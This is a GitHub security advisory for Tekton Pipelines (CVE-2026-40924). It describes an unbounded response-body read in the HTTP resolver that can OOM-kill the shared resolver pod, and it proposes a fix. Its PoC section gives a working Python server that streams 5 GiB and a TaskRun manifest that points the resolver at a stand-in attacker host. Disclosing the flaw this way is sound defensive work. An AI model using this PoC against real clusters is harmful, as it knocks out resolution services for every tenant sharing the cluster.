Skip to content

Tekton Pipelines: HTTP Resolver Unbounded Response Body Read Enables Denial of Service via Memory Exhaustion

Moderate severity GitHub Reviewed Published Apr 21, 2026 in tektoncd/pipeline • Updated Apr 24, 2026

Package

gomod github.com/tektoncd/pipeline (Go)

Affected versions

<= 1.11.0

Patched versions

1.11.1

Description

Summary

The HTTP resolver's FetchHttpResource function calls io.ReadAll(resp.Body) with no response body size limit. Any tenant with permission to create TaskRuns or PipelineRuns that reference the HTTP resolver can point it at an attacker-controlled HTTP server that returns a very large response body within the 1-minute timeout window, causing the tekton-pipelines-resolvers pod to be OOM-killed by Kubernetes. Because all resolver types (Git, Hub, Bundle, Cluster, HTTP) run in the same pod, crashing this pod denies resolution service to the entire cluster. Repeated exploitation causes a sustained crash loop. The same vulnerable code path is reached by both the deprecated pkg/resolution/resolver/http and the current pkg/remoteresolution/resolver/http implementations.

Details

pkg/resolution/resolver/http/resolver.go:279–307:

func FetchHttpResource(ctx context.Context, params map[string]string,
    kubeclient kubernetes.Interface, logger *zap.SugaredLogger) (framework.ResolvedResource, error) {

    httpClient, err := makeHttpClient(ctx)  // default timeout: 1 minute
    // ...
    resp, err := httpClient.Do(req)
    // ...
    defer func() { _ = resp.Body.Close() }()

    body, err := io.ReadAll(resp.Body)  // ← no size limit
    if err != nil {
        return nil, fmt.Errorf("error reading response body: %w", err)
    }
    // ...
}

makeHttpClient sets http.Client{Timeout: timeout} where timeout defaults to 1 minute and is configurable via fetch-timeout in the http-resolver-config ConfigMap. The timeout bounds the duration of the entire request (including body read), which limits slow-drip attacks. However, it does not limit the total number of bytes allocated. A fast HTTP server can deliver multi-gigabyte responses well within the 1-minute window.

The resolver deployment (config/core/deployments/resolvers-deployment.yaml) sets a 4 GiB memory limit on the controller container. A response of 4 GiB or larger delivered at wire speed will cause io.ReadAll to allocate 4 GiB, triggering an OOM-kill. With the default timeout of 60 seconds, a server delivering at 100 MB/s can supply 6 GB — well above the 4 GiB limit — before the timeout fires.

The remoteresolution HTTP resolver (pkg/remoteresolution/resolver/http/resolver.go:90) delegates directly to the same FetchHttpResource function and is equally affected.

PoC

# Step 1: Run an HTTP server that streams a large response fast
python3 - <<'EOF'
import http.server, socketserver

class LargeResponseHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.end_headers()
        # Stream 5 GB at full speed — completes in <60s on a local network
        chunk = b"X" * (1024 * 1024)  # 1 MiB chunk
        for _ in range(5120):          # 5120 * 1 MiB = 5 GiB
            self.wfile.write(chunk)

    def log_message(self, *args):
        pass

with socketserver.TCPServer(("", 8080), LargeResponseHandler) as httpd:
    httpd.serve_forever()
EOF

# Step 2: Create a TaskRun that triggers the HTTP resolver
kubectl create -f - <<'EOF'
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: dos-poc
  namespace: default
spec:
  taskRef:
    resolver: http
    params:
      - name: url
        value: http://attacker-server.internal:8080/large-payload
EOF

# Expected result: tekton-pipelines-resolvers pod is OOM-killed.
# All resolver types in the cluster (git, hub, bundle, cluster, http)
# become unavailable until Kubernetes restarts the pod.
# Repeated submission causes a crash loop that continuously disrupts
# resolution for all tenants in the cluster.

Note: On clusters where operators have set a higher fetch-timeout (e.g., 10m), the attacker has more time to deliver a larger body, and the attack is more reliable. On clusters with tight memory limits on the resolver pod, a smaller payload suffices.

Impact

  • Denial of Service: OOM-kill of the tekton-pipelines-resolvers pod denies all resolution services cluster-wide until Kubernetes restarts the pod.
  • Crash loop amplification: A tenant can submit multiple concurrent TaskRuns pointing to the attack server. Each in-flight resolution request accumulates memory independently in the same pod, reducing the payload size needed to reach the OOM threshold.
  • Blast radius: Because all resolver types share a single pod, disrupting the HTTP resolver also disrupts unrelated users of the Git, Bundle, Cluster, and Hub resolvers. This is a cluster-wide availability impact achievable by a single namespace-level user.

Recommended Fix

Wrap resp.Body with io.LimitReader before passing to io.ReadAll. Add a configurable max-body-size option to the http-resolver-config ConfigMap with a sensible default (e.g., 50 MiB, which exceeds the size of any realistic pipeline YAML file):

const defaultMaxBodyBytes = 50 * 1024 * 1024 // 50 MiB

// In FetchHttpResource, replace:
//   body, err := io.ReadAll(resp.Body)
// with:
maxBytes := int64(defaultMaxBodyBytes)
if v, ok := conf["max-body-size"]; ok {
    if parsed, err := strconv.ParseInt(v, 10, 64); err == nil {
        maxBytes = parsed
    }
}
limitedReader := io.LimitReader(resp.Body, maxBytes+1)
body, err := io.ReadAll(limitedReader)
if err != nil {
    return nil, fmt.Errorf("error reading response body: %w", err)
}
if int64(len(body)) > maxBytes {
    return nil, fmt.Errorf("response body exceeds maximum allowed size of %d bytes", maxBytes)
}

This fix must be applied to FetchHttpResource in pkg/resolution/resolver/http/resolver.go, which is shared by both the deprecated and current HTTP resolver implementations.

References

@vdemeester vdemeester published to tektoncd/pipeline Apr 21, 2026
Published to the GitHub Advisory Database Apr 21, 2026
Reviewed Apr 21, 2026
Published by the National Vulnerability Database Apr 21, 2026
Last updated Apr 24, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(13th percentile)

Weaknesses

Uncontrolled Resource Consumption

The product does not properly control the allocation and maintenance of a limited resource. Learn more on MITRE.

CVE ID

CVE-2026-40924

GHSA ID

GHSA-m2cx-gpqf-qf74

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.